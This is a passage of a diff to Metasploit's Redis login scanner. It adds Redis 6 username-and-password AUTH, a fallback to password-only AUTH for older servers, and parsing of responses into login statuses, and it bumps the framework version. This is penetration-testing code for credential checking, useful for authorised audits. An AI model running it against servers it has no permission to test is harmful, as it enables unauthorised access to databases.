+            # If we're dealing with an older redis version or the previous call failed,
+            # try the backwards compatibility call instead.
+            # We also set the @older_redis to true if we haven't as we might be entering this
+            # block from the match response.
+            if @older_redis || (response && response.match(::Rex::Proto::Redis::Base::Constants::WRONG_ARGUMENTS_FOR_AUTH))
+              @older_redis ||= true
+              response = authenticate_pre_v6(credential.private.to_s)
            end

+            result_options[:proof] = response
+            result_options[:status] = validate_login(result_options[:proof])
          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
            result_options.merge!(
              proof: e,
              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
            )
          end
-          disconnect if self.sock
+
+          disconnect if sock
+
          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
        end

        private

+        # Authenticates against Redis using the provided credentials arguments.
+        # Takes either a password, or a username and password combination.
+        #
+        # @param [String] username The username to authenticate with, defaults to 'default'
+        # @param [String] password The password to authenticate with.
+        # @return [String] The response from Redis for the AUTH command.
+        def authenticate(username, password)
+          command = redis_proto(['AUTH', username.blank? ? 'default' : username, password])
+          sock.put(command)
+          sock.get_once
+        end
+
+        # Authenticates against Redis using the provided password.
+        # This method is for older Redis instances of backwards compatibility.
+        #
+        # @param [String] password The password to authenticate with.
+        # @return [String] The response from Redis for the AUTH command.
+        def authenticate_pre_v6(password)
+          command = redis_proto(['AUTH', password])
+          sock.put(command)
+          sock.get_once
+        end
+
+        # Validates the login data received from Redis and returns the correct Login status
+        # based upon the contents Redis sent back:
+        #
+        # No password      - ( -ERR Client sent AUTH, but no password is set\r\n )
+        # Invalid password - ( -ERR invalid password\r\n )
+        # Valid password   - (+OK\r\n)
+        def validate_login(data)
+          return if data.nil?
+
+          return Metasploit::Model::Login::Status::NO_AUTH_REQUIRED if no_password_set?(data)
+          return Metasploit::Model::Login::Status::INCORRECT if invalid_password?(data)
+          return Metasploit::Model::Login::Status::SUCCESSFUL if data.match(::Rex::Proto::Redis::Base::Constants::OKAY)
+
+          nil
+        end
+
+        def no_password_set?(data)
+          data.match(::Rex::Proto::Redis::Base::Constants::NO_PASSWORD_SET) ||
+            data.match(::Rex::Proto::Redis::Version6::Constants::NO_PASSWORD_SET)
+        end
+
+        def invalid_password?(data)
+          data.match(::Rex::Proto::Redis::Base::Constants::WRONG_PASSWORD) ||
+            data.match(::Rex::Proto::Redis::Version6::Constants::WRONG_PASSWORD)
+        end
+
        # (see Base#set_sane_defaults)
        def set_sane_defaults
-          self.connection_timeout  ||= 30
-          self.port                ||= DEFAULT_PORT
-          self.max_send_size       ||= 0
-          self.send_delay          ||= 0
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
        end
      end
    end
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.7"
+      VERSION = "6.4.23"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.5
 .1.5